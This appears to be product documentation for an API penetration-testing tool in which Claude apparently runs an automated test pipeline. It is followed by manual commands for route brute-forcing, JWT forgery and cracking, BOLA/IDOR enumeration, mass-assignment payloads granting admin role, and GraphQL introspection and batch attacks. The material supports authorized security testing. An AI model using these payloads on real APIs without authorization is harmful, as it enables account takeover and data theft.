API Pentest

Prerequisites

API base URL (e.g. https://api.target.com)
Authorization token (Bearer, API key, or OAuth client credentials)
OpenAPI / Swagger spec file (.json or .yaml) — highly recommended
GraphQL endpoint URL if applicable
At least one valid authenticated user account
Second user account for BOLA/IDOR testing (different role/tenant)

1

Select API Pentest from Home Screen

Click 🔌 API Pentest. The wizard opens pre-configured for API testing with API-specific questions.
2

Answer API-Specific Wizard Questions

API Base URL : https://api.target.com/v1 Auth Type : Bearer JWT / API Key / OAuth2 / Basic / None OpenAPI Spec : Upload spec file or enter Swagger URL GraphQL : Yes → enter endpoint URL Rate Limiting : Observed? Yes/No (affects fuzzing speed) User Accounts : User A (standard) + User B (different tenant/role) Business Context : e.g. "multi-tenant SaaS, users have orgs and projects"
3

Claude Runs the API Test Suite

Claude orchestrates the full API test pipeline automatically:

Phase 1: Route discovery — kiterunner brute-force (if no spec) Phase 2: Auth analysis — JWT decode, algorithm confusion, key strength Phase 3: BOLA testing — swap User A object IDs with User B token Phase 4: Mass assignment — extra fields in POST/PUT/PATCH bodies Phase 5: Injection — SQL/NoSQL/SSTI in all parameters Phase 6: Rate limits — threshold testing per endpoint Phase 7: GraphQL — introspection, batch attacks, field suggestions Phase 8: Business logic — AI-driven logic flaw discovery
4

Review Findings and Generate API Security Report

All confirmed findings include: endpoint, HTTP method, request/response PoC, CVSS score, and remediation. Generate the Technical Report for full API security coverage.

⏱️ Typical duration: 20–90 minutes for a mid-size API (100–500 endpoints).

Prerequisites

curl or httpie installed
jwt_tool, kiterunner, graphql-cop installed
API documentation or recorded traffic from Burp Suite

1

Discover API Routes

# With OpenAPI spec cat swagger.json | jq '.paths | keys[]' # Without spec — brute force kiterunner scan https://api.target.com \ -w routes-large.kite \ --output-file routes.txt \ -H "Authorization: Bearer $TOKEN" # Check for spec exposure curl https://api.target.com/swagger.json curl https://api.target.com/openapi.yaml curl https://api.target.com/v1/docs
2

JWT Analysis

# Decode JWT echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq . # Test algorithm confusion (RS256 → HS256) jwt_tool $TOKEN -X a # Test null algorithm (alg: none) jwt_tool $TOKEN -X n # Crack weak secret jwt_tool $TOKEN -C -d /usr/share/wordlists/rockyou.txt # Test kid injection jwt_tool $TOKEN -I -hc kid -hv "../../dev/null"
3

BOLA / IDOR Testing

# User A creates object → get ID curl -H "Authorization: Bearer $TOKEN_A" \ https://api.target.com/v1/documents/123 # Access User A's object with User B's token curl -H "Authorization: Bearer $TOKEN_B" \ https://api.target.com/v1/documents/123 # If returns 200 with data → BOLA confirmed # Test numeric enumeration for i in $(seq 1 100); do curl -s -o /dev/null -w "%{http_code} $i\n" \ -H "Authorization: Bearer $TOKEN_B" \ https://api.target.com/v1/users/$i done
4

Mass Assignment Testing

# Add extra fields to update requests # Normal: {"name": "John"} # Test: {"name": "John", "role": "admin", "is_verified": true} curl -X PUT https://api.target.com/v1/profile \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{"name":"John","role":"admin","is_verified":true,"balance":999999}'
5

GraphQL Testing

# Introspection query curl https://api.target.com/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{__schema{types{name fields{name}}}}"}' # graphql-cop automated scan graphql-cop -t https://api.target.com/graphql \ -H "Authorization: Bearer $TOKEN" # Batch query attack (rate limit bypass) curl https://api.target.com/graphql \ -d '[{"query":"query{user(id:1){email}}"}, {"query":"query{user(id:2){email}}"}, {"query":"query{user(id:3){email}}"}]'

⏱️ Duration: 4–12 hours for thorough manual API security assessment.

Common Issues

The API may require authentication headers for route discovery. Add -H "Authorization: Bearer $TOKEN". Also try different wordlists: -w assetnote-api-routes.kite. If the API uses versioning, try the base path with --base-path /api/v1/.

The authorization check may only apply to direct ID access. Try: object references in nested resources (/users/me/documents/123), parameter pollution (?user_id=victim_id), HTTP method switching (GET vs POST), and indirect reference maps (look for GUIDs that map to sequential IDs).

Use field suggestion attacks: send queries with typos to trigger "did you mean X?" suggestions that leak schema. Use Clairvoyance tool for blind schema extraction. Check if introspection works in development mode (different endpoint or header).

Prerequisites

Select API Pentest from Home Screen

Answer API-Specific Wizard Questions

Claude Runs the API Test Suite

Review Findings and Generate API Security Report

Prerequisites

Complete Wizard and Receive First Proposal

Approve Route Discovery

Review Each Authentication Test Proposal

Prerequisites

Discover API Routes

JWT Analysis

BOLA / IDOR Testing

Mass Assignment Testing

GraphQL Testing

Common Issues

API Pentest

Prerequisites

Select API Pentest from Home Screen

Answer API-Specific Wizard Questions

Claude Runs the API Test Suite

Review Findings and Generate API Security Report

Prerequisites

Complete Wizard and Receive First Proposal

Approve Route Discovery

Review Each Authentication Test Proposal

Prerequisites

Discover API Routes

JWT Analysis

BOLA / IDOR Testing

Mass Assignment Testing

GraphQL Testing

Common Issues

Related Topics